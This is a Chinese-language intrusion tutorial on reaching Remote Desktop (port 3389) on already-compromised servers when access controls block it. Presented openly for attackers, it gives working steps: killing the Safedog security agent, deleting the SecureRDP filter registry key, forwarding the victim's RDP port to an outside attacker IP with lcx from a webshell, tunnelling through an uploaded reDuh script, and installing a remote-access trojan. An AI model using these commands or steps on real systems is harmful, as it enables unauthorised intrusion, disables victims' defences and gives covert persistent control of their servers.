突破各种对3389连接的访问限制
-
在开了3389终端之后但是连接不上的可能情况:
(1).目标服务器是内网 终端端口是你开的话 99%需要端口转发 有时候如果服务器开了终端的话
很有可能映射了也不就需要转发
(2). 目标是外网 开了3389 但连接不上终端以下是各种情况可能原因及突破办法
1. 突破安全狗限制连接终端:
突破安全狗限制连接服务器终端:执行杀安全狗的exe
2. 突破SecureRDP限制连接终端
科普:SecureRDP是一款国外的软件,可以用该软件限制远程桌面登录的计算机名、MAC、IP,指定的才能登陆服务器的远程桌面,否则一律拒绝,支持Windows2003服务器操作系统,以下是这款限制软件的突破方法:
执行目录
echo y | reg delete HKEY_LOCAL_MACHINESOFTWARETerminalsoftWTSFilter
删除这个限制连接上去3. lcx进行端口转发 (不是内网才可以转发 有时候外网的时候连接不上终端也尝试下转发出来连接 )
类型的工具还有 mylcx hd
webshell里执行
lcx.exe -slave 117.21.173.97 51 127.0.0.1 3389
(其实aspx大马自带一个转发的功能和上面的这行命令意义一样
127.0.0.1 3389 117.21.173.97 51 )
意思是将本机的3389转发到 117.21.173.97的51端口上
自己的cmd里面执
lcx.exe -listen 51 12345
意思是监听本机51端口 转发到本机的12345端口
如果有数据过来了 就连接本机的12345端口是连接目标服务器的终端
mstsc ————
127.0.0.1:12345
lcx自己补充完整的路径
117.21.173.97 你的外网ip
51 监听端口
127.0.0.1 不用变
3389 服务器的终端端口4. 利用 reDuhServers 突破转发
分为控制端和服务端将服务端上传网站目录 看目标站支持什么脚本 如果aspx的就上传aspx的脚本即可
记录http地址本机(自己需要时外网)打开客服端
地址栏输入 http地址
127.0.0.1 12345
3389127.0.0.1不要动 12345 你等下连接的端口
3389 服务器的终端端口点击start 开启 看到有数据交换了 就连接本机
12345端口即可
127.0.0.1:12345
之后装远控软件 进行远程图形化操作即可 转发的时候
速度是超级慢 所以才说55.利用远程控制突破终端连接限制:
利用自己取得的系统权限,运行一个远控小马 上线之后控制桌面
装远控